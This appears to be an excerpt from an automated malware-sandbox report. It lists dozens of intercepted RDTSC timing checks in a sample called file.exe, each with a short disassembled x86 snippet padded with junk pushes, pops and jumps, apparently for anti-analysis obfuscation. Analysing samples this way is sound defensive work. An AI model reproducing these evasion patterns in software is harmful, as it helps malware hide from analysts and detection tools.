                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D2E0 second address: A9D368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1AF0h], esi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F374C500078h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov bl, BBh 0x0000003c mov edi, dword ptr [ebp+122D1830h] 0x00000042 mov eax, dword ptr [ebp+122D156Dh] 0x00000048 push FFFFFFFFh 0x0000004a mov di, si 0x0000004d pushad 0x0000004e mov esi, ebx 0x00000050 jmp 00007F374C500082h 0x00000055 popad 0x00000056 push eax 0x00000057 pushad 0x00000058 push esi 0x00000059 push esi 0x0000005a pop esi 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D368 second address: A9D36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADB56 second address: AADB6C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F374C500076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F374C500076h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADC90 second address: AADCC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F374CE66326h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F374CE66339h 0x00000015 jp 00007F374CE66326h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADCC0 second address: AADD03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F374C500083h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jns 00007F374C50007Ah 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADDB3 second address: AADDF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE6632Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F374CE6632Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007F374CE66337h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADDF1 second address: AADE16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d js 00007F374C500088h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE16 second address: AADE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE1A second address: AADE2D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F374C500076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE2D second address: AADE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE32 second address: AADE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F374C500088h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F374C500076h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADF59 second address: AADF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADF5F second address: AADF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F374C500076h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 jmp 00007F374C50007Ch 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADF87 second address: AADF8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB32D5 second address: AB32EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F374C500084h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB32EE second address: AB32F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3462 second address: AB346B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3714 second address: AB371E instructions: 0x00000000 rdtsc 0x00000002 je 00007F374CE66326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB39AD second address: AB39C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F374C50007Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB39C1 second address: AB39C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB39C7 second address: AB39D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB93D4 second address: AB93DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F374CE66326h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB93DE second address: AB93FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C50007Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F374C500076h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB93FA second address: AB93FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46F19 second address: A46F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46F1D second address: A46F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8240 second address: AB8246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8390 second address: AB839A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F374CE6632Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8CDD second address: AB8CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8E52 second address: AB8E6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66330h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC05F second address: ABC069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC069 second address: ABC0AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F374CE66330h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F374CE6632Eh 0x00000018 pushad 0x00000019 jng 00007F374CE66326h 0x0000001f js 00007F374CE66326h 0x00000025 popad 0x00000026 jng 00007F374CE6632Eh 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1353 second address: AC136F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F374C500076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F374C50007Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC136F second address: AC1373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CC9C second address: A8CCA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CCA1 second address: A8CCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CCA7 second address: A8CCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnl 00007F374C50007Eh 0x00000011 jl 00007F374C500078h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F374C500080h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ebx 0x00000023 jnl 00007F374C500078h 0x00000029 push esi 0x0000002a pop esi 0x0000002b pop ebx 0x0000002c pop eax 0x0000002d mov edi, dword ptr [ebp+122D258Fh] 0x00000033 call 00007F374C500079h 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CCF5 second address: A8CCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CCF9 second address: A8CCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CCFD second address: A8CD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F374CE66333h 0x00000010 jmp 00007F374CE6632Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CD1A second address: A8CD2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CD2B second address: A8CD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CD2F second address: A8CD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F374C500089h 0x00000012 jnl 00007F374C50007Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CD5D second address: A8CD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CD6F second address: A8CD73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D0E6 second address: A8D105 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F374CE6632Ch 0x00000008 je 00007F374CE66326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F374CE6632Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D105 second address: A8D116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D2B4 second address: A8D2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F374CE66338h 0x0000000e mov dword ptr [ebp+12453A47h], edi 0x00000014 pop edx 0x00000015 push 00000004h 0x00000017 xor edx, dword ptr [ebp+122D2531h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F374CE6632Ch 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D2F3 second address: A8D304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D304 second address: A8D308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D9F0 second address: A8D9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC09B0 second address: AC09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC09B4 second address: AC09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a jmp 00007F374C50007Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC09D4 second address: AC09DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC09DD second address: AC0A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F374C500087h 0x0000000d jmp 00007F374C500083h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0CAE second address: AC0CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F374CE6632Dh 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jo 00007F374CE6632Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0E66 second address: AC0E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC46AD second address: AC46B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC46B3 second address: AC46DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F374C500097h 0x0000000d jmp 00007F374C500087h 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8AEC second address: AC8AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C25 second address: AC8C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C29 second address: AC8C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C2D second address: AC8C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C36 second address: AC8C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8C3C second address: AC8C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F374C500076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jp 00007F374C500076h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8D85 second address: AC8D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8D8C second address: AC8D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F374C500076h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9074 second address: AC907C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC907C second address: AC9080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC91E3 second address: AC91E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC950F second address: AC951B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC951B second address: AC9542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F374CE66336h 0x00000010 jo 00007F374CE66326h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC96A0 second address: AC96C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jnp 00007F374C500076h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9E91 second address: AC9E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD790 second address: ACD7AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F374C50007Ch 0x00000008 jno 00007F374C500076h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 jnp 00007F374C500082h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD7AD second address: ACD7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F374CE66326h 0x0000000a jc 00007F374CE6632Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDA86 second address: ACDA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0291 second address: AD0296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0296 second address: AD02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C500089h 0x00000009 jmp 00007F374C50007Dh 0x0000000e popad 0x0000000f jo 00007F374C500086h 0x00000015 jmp 00007F374C50007Eh 0x0000001a pushad 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jo 00007F374C50007Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD02E3 second address: AD02E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACFE62 second address: ACFE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD80D4 second address: AD80DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6A2C second address: AD6A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C50007Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6A3C second address: AD6A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6A40 second address: AD6A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6E93 second address: AD6EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374CE66334h 0x00000009 jmp 00007F374CE66333h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6EBF second address: AD6EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD703B second address: AD703F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD703F second address: AD7043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7043 second address: AD707A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F374CE66339h 0x00000010 jmp 00007F374CE66331h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD707A second address: AD7097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jl 00007F374C5000A3h 0x0000000c jmp 00007F374C50007Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
